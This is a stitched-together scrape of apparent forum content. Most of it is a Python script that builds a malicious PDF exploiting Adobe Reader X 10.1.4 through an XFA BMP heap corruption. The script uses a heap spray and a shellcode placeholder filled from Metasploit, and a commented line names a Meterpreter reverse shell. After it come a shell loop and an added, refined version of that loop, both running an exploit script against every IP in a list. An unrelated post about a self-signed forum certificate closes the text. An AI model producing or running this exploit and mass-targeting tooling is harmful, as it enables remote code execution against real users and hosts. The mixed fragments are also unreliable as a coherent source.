util.pack(0x46464646); //0x90 pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); //0xa0 pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); //0xb0 pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); //0xc0 pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.packs("VirtualProtect"); //@0xCC pointer_slide += "\u0000"; pointer_slide += "KERNEL32"; pointer_slide += "\u0000"; pointer_slide += "%%SHELLCODE%%"; while (pointer_slide.length < 0x1000/2) pointer_slide += util.pack(0x41414141); pointer_slide = pointer_slide.substring(0,0x1000/2); util.message("Pointer slide size: " + pointer_slide.length); // And now ensure it gets bigger than 0x100000 bytes while (pointer_slide.length < 0x100000/2) pointer_slide += pointer_slide; // And the actual spray for (i=0; i < 100; i+=1) spray.pointers[i] = pointer_slide.substring(16, 0x100000/2-16-2)+ util.pack(i) + ""; // Everything done here close the doc and // trigger the use of the vtable util.message("Now what?"); var pdfDoc = event.target; pdfDoc.closeDoc(true); </script> </event> </subform> <?originalXFAVersion http://www.xfa.org/schema/xfa-template/2.5/?> <?templateDesigner DefaultLanguage JavaScript?> <?templateDesigner DefaultRunAt client?> <?acrobat JavaScript strictScoping?> <?PDFPrintOptions embedViewerPrefs 0?> <?PDFPrintOptions embedPrintOnFormOpen 0?> <?PDFPrintOptions scalingPrefs 0?> <?PDFPrintOptions enforceScalingPrefs 0?> <?PDFPrintOptions paperSource 0?> <?PDFPrintOptions duplexMode 0?> <?templateDesigner DefaultPreviewType interactive?> <?templateDesigner DefaultPreviewPagination simplex?> 
    <?templateDesigner XDPPreviewFormat 19?>
    <?templateDesigner DefaultCaptionFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?>
    <?templateDesigner DefaultValueFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?>
    <?templateDesigner Zoom 119?>
    <?templateDesigner FormTargetVersion 30?>
    <?templateDesigner SaveTaggedPDF 1?>
    <?templateDesigner SavePDFWithEmbeddedFonts 1?>
    <?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?></template>
    <config xmlns="http://www.xfa.org/schema/xci/3.0/">
      <agent name="designer">
        <!-- [0..n] -->
        <destination>pdf</destination>
        <pdf>
          <!-- [0..n] -->
          <fontInfo/>
        </pdf>
      </agent>
      <present>
        <!-- [0..n] -->
        <pdf>
          <!-- [0..n] -->
          <version>1.7</version>
          <adobeExtensionLevel>5</adobeExtensionLevel>
        </pdf>
        <common/>
        <xdp>
          <packets>*</packets>
        </xdp>
      </present>
    </config>
    <localeSet xmlns="http://www.xfa.org/schema/xfa-locale-set/2.7/">
      <locale name="en_US" desc="English (United States)">
        <calendarSymbols name="gregorian">
          <monthNames>
            <month>January</month>
            <month>February</month>
            <month>March</month>
            <month>April</month>
            <month>May</month>
            <month>June</month>
            <month>July</month>
            <month>August</month>
            <month>September</month>
            <month>October</month>
            <month>November</month>
            <month>December</month>
          </monthNames>
          <monthNames abbr="1">
            <month>Jan</month>
            <month>Feb</month>
            <month>Mar</month>
            <month>Apr</month>
            <month>May</month>
            <month>Jun</month>
            <month>Jul</month>
            <month>Aug</month>
            <month>Sep</month>
            <month>Oct</month>
            <month>Nov</month>
            <month>Dec</month>
          </monthNames>
          <dayNames>
            <day>Sunday</day>
            <day>Monday</day>
            <day>Tuesday</day>
            <day>Wednesday</day>
            <day>Thursday</day>
            <day>Friday</day>
            <day>Saturday</day>
          </dayNames>
          <dayNames abbr="1">
            <day>Sun</day>
            <day>Mon</day>
            <day>Tue</day>
            <day>Wed</day>
            <day>Thu</day>
            <day>Fri</day>
            <day>Sat</day>
          </dayNames>
          <meridiemNames>
            <meridiem>AM</meridiem>
            <meridiem>PM</meridiem>
          </meridiemNames>
          <eraNames>
            <era>BC</era>
            <era>AD</era>
          </eraNames>
        </calendarSymbols>
        <datePatterns>
          <datePattern name="full">EEEE, MMMM D, YYYY</datePattern>
          <datePattern name="long">MMMM D, YYYY</datePattern>
          <datePattern name="med">MMM D, YYYY</datePattern>
          <datePattern name="short">M/D/YY</datePattern>
        </datePatterns>
        <timePatterns>
          <timePattern name="full">h:MM:SS A Z</timePattern>
          <timePattern name="long">h:MM:SS A Z</timePattern>
          <timePattern name="med">h:MM:SS A</timePattern>
          <timePattern name="short">h:MM A</timePattern>
        </timePatterns>
        <dateTimeSymbols>GyMdkHmsSEDFwWahKzZ</dateTimeSymbols>
        <numberPatterns>
          <numberPattern name="numeric">z,zz9.zzz</numberPattern>
          <numberPattern name="currency">$z,zz9.99|($z,zz9.99)</numberPattern>
          <numberPattern name="percent">z,zz9%</numberPattern>
        </numberPatterns>
        <numberSymbols>
          <numberSymbol name="decimal">.</numberSymbol>
          <numberSymbol name="grouping">,</numberSymbol>
          <numberSymbol name="percent">%</numberSymbol>
          <numberSymbol name="minus">-</numberSymbol>
          <numberSymbol name="zero">0</numberSymbol>
        </numberSymbols>
        <currencySymbols>
          <currencySymbol name="symbol">$</currencySymbol>
          <currencySymbol name="isoname">USD</currencySymbol>
          <currencySymbol name="decimal">.</currencySymbol>
        </currencySymbols>
        <typefaces>
          <typeface name="Myriad Pro"/>
          <typeface name="Minion Pro"/>
          <typeface name="Courier Std"/>
          <typeface name="Adobe Pi Std"/>
          <typeface name="Adobe Hebrew"/>
          <typeface name="Adobe Arabic"/>
          <typeface name="Adobe Thai"/>
          <typeface name="Kozuka Gothic Pro-VI M"/>
          <typeface name="Kozuka Mincho Pro-VI R"/>
          <typeface name="Adobe Ming Std L"/>
          <typeface name="Adobe Song Std L"/>
          <typeface name="Adobe Myungjo Std M"/>
        </typefaces>
      </locale>
      <?originalXFAVersion http://www.xfa.org/schema/xfa-locale-set/2.1/?></localeSet>
    <xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
      <xfa:data xfa:dataNode="dataGroup"/>
    </xfa:datasets>
    <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.2-c001 63.139439, 2011/06/07-10:39:26 ">
      <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
        <rdf:Description xmlns:xmp="http://ns.adobe.com/xap/1.0/" rdf:about="">
          <xmp:MetadataDate>2012-11-23T13:41:54Z</xmp:MetadataDate>
          <xmp:CreatorTool>Adobe LiveCycle Designer ES 10.0</xmp:CreatorTool>
          <xmp:ModifyDate>2012-11-23T05:26:02-08:00</xmp:ModifyDate>
          <xmp:CreateDate>2012-11-23T05:15:47-08:00</xmp:CreateDate>
        </rdf:Description>
        <rdf:Description xmlns:pdf="http://ns.adobe.com/pdf/1.3/" rdf:about="">
          <pdf:Producer>Adobe LiveCycle Designer ES 10.0</pdf:Producer>
        </rdf:Description>
        <rdf:Description xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" rdf:about="">
          <xmpMM:DocumentID>uuid:0aa46f9b-2c50-42d4-ab0b-1a1015321da7</xmpMM:DocumentID>
          <xmpMM:InstanceID>uuid:86c66599-7238-4e9f-8fad-fe2cd922afb2</xmpMM:InstanceID>
        </rdf:Description>
        <rdf:Description xmlns:dc="http://purl.org/dc/elements/1.1/" rdf:about="">
          <dc:format>application/pdf</dc:format>
        </rdf:Description>
      </rdf:RDF>
    </x:xmpmeta>
    <xfdf xmlns="http://ns.adobe.com/xfdf/" xml:space="preserve">
      <annots/>
    </xfdf></xdp:xdp>
    '''

    assert len(shellcode) <= 0xF00, "You need a smaller shellcode, sorry"

    #shellcode: fill the placeholders in the XDP template
    xdp = xdp.replace("%%SHELLCODE%%",UEncode(shellcode))
    xdp = xdp.replace("%%SLIDESIZE%%", "0x%x"%SLIDESIZE);
    xdp = xdp.replace("%%MINICHUNKX%%",UEncode('O'*SLIDESIZE))
    xdp = xdp.replace("%%BMPFREELFH%%",mkBMP('\x01\x00\x00\x00\x00\x00'+ chr(0x27)+'\x05',True).encode('base64'))
    #xdp = xdp.replace("%%BMPFREELFH%%",file("/usr/share/pixmaps/gnome-news.png","rb").read().encode('base64'))
    file("%s.log"%sys.argv[0].split('.')[0],'wb').write(xdp)

    #The document
    doc = PDFDoc()

    #font
    font = PDFDict()
    font.add("Name", PDFName("F1"))
    font.add("Subtype", PDFName("Type1"))
    font.add("BaseFont", PDFName("Helvetica"))

    #name:font map
    fontname = PDFDict()
    fontname.add("F1",font)

    #resources
    resources = PDFDict()
    resources.add("Font",fontname)

    #contents
    contentsDict = PDFDict()
    contents= PDFStream(contentsDict, '''BT
    /F1 24 Tf
    100 100 Td
    (Pedefe Pedefeito Pedefeon!) Tj
    ET''')

    #page
    page = PDFDict()
    page.add("Type",PDFName("Page"))
    page.add("Resources",resources)
    page.add("Contents", PDFRef(contents))

    #pages
    pages = PDFDict()
    pages.add("Type", PDFName("Pages"))
    pages.add("Kids", PDFArray([PDFRef(page)]))
    pages.add("Count", PDFNum(1))
    #add parent reference in page
    page.add("Parent",PDFRef(pages))

    #the XFA form is a Flate-compressed stream holding the XDP built above
    xfa = PDFStream(PDFDict(), xdp)
    xfa.appendFilter(FlateDecode())
    doc.add(xfa)

    #form
    form = PDFDict()
    form.add("XFA", PDFRef(xfa))
    doc.add(form)

    #shellcode2
    shellcode2 = PDFStream(PDFDict(), struct.pack("<L",0xcac0face)+"\xcc"*10)
    doc.add(shellcode2)

    #catalog: NeedsRendering + AcroForm/XFA make Reader render the XFA form
    catalog = PDFDict()
    catalog.add("Type", PDFName("Catalog"))
    catalog.add("Pages", PDFRef(pages))
    catalog.add("NeedsRendering", "true")
    catalog.add("AcroForm", PDFRef(form))

    adbe = PDFDict()
    adbe.add("BaseVersion","/1.7")
    adbe.add("ExtensionLevel",PDFNum(3))
    extensions = PDFDict()
    extensions.add("ADBE", adbe)
    catalog.add("Extensions",extensions)

    doc.add([catalog,pages,page,contents])
    doc.setRoot(catalog)
    #render it
    return doc.__str__()

if __name__ == '__main__':
    import optparse, os, sys
    from subprocess import Popen, PIPE
    parser = optparse.OptionParser(description='Adobe Reader X 10.1.4 XFA BMP RLE Exploit')
    parser.add_option('--debug', action='store_true', default=False, help='For debugging')
    parser.add_option('--msfpayload', metavar='MSFPAYLOAD', default="windows/messagebox ", help="Metasploit payload. Ex. 'win32_exec CMD=calc'")
    parser.add_option('--payload', metavar='PAYLOAD', default=None)
    parser.add_option('--doc', action='store_true', default=False, help='Print detailed documentation')
    (options, args) = parser.parse_args()
    if options.doc:
        print __doc__
        sys.exit(-1)   # the original called os.exit(), which does not exist; sys.exit() is meant
    if options.debug:
        print mkXFAPDF(),
        sys.exit(-1)   # same fix as above
    if options.payload == None:
        #"windows/meterpreter/reverse_tcp LHOST=192.168.56.1 EXITFUNC=process R"
        msfpayload = Popen("msfpayload4.4 %s R"%options.msfpayload, shell=True, stdout=PIPE)
        shellcode = msfpayload.communicate()[0]
    else:
        shellcode = file(options.payload, "rb").read() #options.hexpayload.decode('hex')
    print mkXFAPDF(shellcode),

Source: Adobe Reader X 10.1.4.38 - BMP/RLE Heap Corruption
-
Is it your account?
-
for ip in `cat ips.txt`
do
    nohup perl expl.pl $ip > /dev/null
done
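A fuller version of the loop in the post above, as an added example rather than the poster's own command. It validates each target as a dotted-quad IPv4 address, skips blank and commented lines, keeps one log per host instead of discarding output, detaches the child's stdin so it cannot eat the target list, and runs at most MAXJOBS copies at a time. The command is whatever you pass as arguments (the post's `perl expl.pl`); `ips.txt`, `LOGDIR` and `MAXJOBS` are assumed names, not from the post.

```shell
#!/bin/sh
# Added example, not the original poster's code. Runs "CMD ARGS... IP" once per
# valid IPv4 in a target list, in the background, with per-host logs.
# Assumed: LOGDIR and MAXJOBS are ours; override them in the environment.

LOGDIR="${LOGDIR:-./logs}"
MAXJOBS="${MAXJOBS:-5}"

# is_ipv4 ADDR : returns 0 if ADDR is a dotted quad with octets 0-255, else 1
is_ipv4() {
    case $1 in
        *[!0-9.]*|.*|*.|*..*) return 1 ;;   # non-digits, or empty octets
    esac
    rest=$1
    n=0
    while [ -n "$rest" ]; do
        o=${rest%%.*}                        # next octet
        [ "$o" -le 255 ] 2>/dev/null || return 1
        n=$((n + 1))
        case $rest in
            *.*) rest=${rest#*.} ;;
            *)   rest='' ;;
        esac
    done
    [ "$n" -eq 4 ]
}

# run_per_host LISTFILE CMD [ARGS...] : launches "CMD ARGS... IP" for every valid
# IP in LISTFILE, stdout+stderr to $LOGDIR/<ip>.log, at most MAXJOBS at once.
# Invalid lines are reported on stderr and skipped. Prints the number launched.
run_per_host() {
    list=$1
    shift
    mkdir -p "$LOGDIR"
    count=0
    while IFS= read -r line || [ -n "$line" ]; do
        ip=${line%%#*}                                  # drop trailing comments
        ip=$(printf '%s' "$ip" | tr -d ' \t')           # and whitespace
        [ -n "$ip" ] || continue
        if ! is_ipv4 "$ip"; then
            printf 'skipping invalid target: %s\n' "$line" >&2
            continue
        fi
        # </dev/null keeps the child from reading the list we are iterating over;
        # nohup keeps it alive if the SSH session drops, as in the original loop.
        nohup "$@" "$ip" >"$LOGDIR/$ip.log" 2>&1 </dev/null &
        count=$((count + 1))
        # crude throttle: after every MAXJOBS launches, wait for that batch
        [ $((count % MAXJOBS)) -eq 0 ] && wait
    done < "$list"
    wait
    printf '%s\n' "$count"
}

# usage: run_per_host ips.txt perl expl.pl
```

Each host's log lives at `$LOGDIR/<ip>.log`, so a crashed or hung target is visible afterwards instead of vanishing into `/dev/null`. The batch-and-wait throttle is deliberately simple and portable; a per-job semaphore would keep the pipeline fuller but needs `jobs -p`, which is unreliable inside `$(...)` in some shells.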
-
The idea is not bad at all. I'll see what can be done; I was thinking along these lines:
1. Create a CA for RST
2. Sign a certificate for the server (self-signed)
3. Users will be able to download and install the CA so that RST is validated
4. I was thinking of doing this only as an option, for whoever wants it, on a subdomain: secure.rstforums.com
Opinions?
PS: For those who didn't get the idea: just as there is the possibility that the NSA and who knows what other organizations have the private keys of Facebook, Google (SSL certificates)... there is the possibility that they have the private keys (the ones certificates are signed with) of the companies that issue certificates: VeriSign, Comodo, StartSSL... That way, those organizations (the NSA) can do Man in the Middle on the traffic. If, however, we use a self-signed certificate, they would need the key from the RST server. Truth be told, it's rather paranoid, and I don't think anyone would go to that much trouble for RST and some kid selling a root...
- 27 replies